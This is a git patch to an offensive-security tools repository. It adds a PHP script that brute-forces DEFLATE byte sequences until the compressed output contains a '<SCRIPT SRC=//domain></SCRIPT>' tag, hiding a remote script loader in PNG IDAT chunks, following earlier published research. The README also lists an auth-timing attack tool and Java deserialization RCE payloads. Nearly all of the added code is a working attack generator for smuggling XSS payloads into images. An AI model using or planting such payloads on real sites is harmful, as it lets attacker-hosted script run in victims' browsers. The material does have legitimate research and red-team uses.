From 5e2c945322b305f77bd8e31b4ba96db201b93597 Mon Sep 17 00:00:00 2001
From: Mariusz B <mb@binary-offensive.com>
Date: Sun, 7 Oct 2018 19:52:42 +0200
Subject: [PATCH] Added my very simple script named
 generate_png_backdoor_idat_chunks.php

---
 web/README.md                             |  2 ++
 web/generate_png_backdoor_idat_chunks.php | 36 +++++++++++++++++++++++
 2 files changed, 38 insertions(+)
 create mode 100755 web/generate_png_backdoor_idat_chunks.php

diff --git a/web/README.md b/web/README.md
index 0b7ae81..cfbff1a 100644
--- a/web/README.md
+++ b/web/README.md
@@ -20,6 +20,8 @@
 
 - **`dummy-web-server.py`** - a minimal http server in python. Responds to GET, HEAD, POST requests, but will fail on anything else. Forked from: [bradmontgomery/dummy-web-server.py](https://gist.github.com/bradmontgomery/2219997) ([gist](https://gist.github.com/mgeeky/c0675b2cf65bad6171edcb8f3bb2af6d))
 
+- **`generate_png_backdoor_idat_chunks.php`** - PHP script implementing idea of encoding Web Shells in PNG iDAT chunks, according to [this](https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/) research.
+
 - **`http-auth-timing.py`** - HTTP Auth Timing attack tool as presented at Ruxcon CTF 2012 simple web challange. The tools tries to use every letter for auth password and construct the entire password upon the longest took authentication request. ([gist](https://gist.github.com/mgeeky/57e866604942f1824da310982c46da84))
 
 - **`java-XMLDecoder-RCE.md`** - Java Beans XMLDecoder XML-deserialization Remote Code Execution payloads. ([gist](https://gist.github.com/mgeeky/5eb48b17c9d282ad3170ef91cfb6fe4c))
diff --git a/web/generate_png_backdoor_idat_chunks.php b/web/generate_png_backdoor_idat_chunks.php
new file mode 100755
index 0000000..608b857
--- /dev/null
+++ b/web/generate_png_backdoor_idat_chunks.php
@@ -0,0 +1,36 @@
+<?php
+  $domain = strtoupper($argv[1]);
+  $filename = $argv[2];
+
+  // DEFLATE stream bytes
+  $prefix = '7ff399281922111510691928276e6e';
+  $suffix = '576e69b16375535b6f';
+
+  $precode = '<SCRIPT SRC=//';
+  $postcode = '></SCRIPT>';
+
+  print "Input string to embed in PNG IDAT chunks:\n";
+  print '"' . $precode . $domain . $postcode . "\"\n\n\n";
+
+  $cnt = 0;
+  for( $i = 0x111111111111; $i < 0xffffffffffff; $i++, $cnt++) {
+    $b = implode('', str_split(str_pad(dechex($i), 12, '0', STR_PAD_LEFT), 2));
+
+    try {
+      $defl = gzdeflate(hex2bin($prefix . $b . $suffix ));
+
+      if ( $cnt % 100000 == 0) {
+        printf("[Probe: %06d] %s\r\n", $cnt, $defl);
+      }
+
+      if (strpos(strtoupper($defl), $precode.$domain.$postcode) !== false ) { 
+        $cont = bin2hex($defl);
+        printf("DEFLATE stream found!\n%s\n%s\n\n", $prefix.$b.$suffix, $defl);
+        file_put_contents($filename, $cont);
+      }
+    } catch( exception $e) {
+    }
+  }
+
+  print 'Done.'
+?>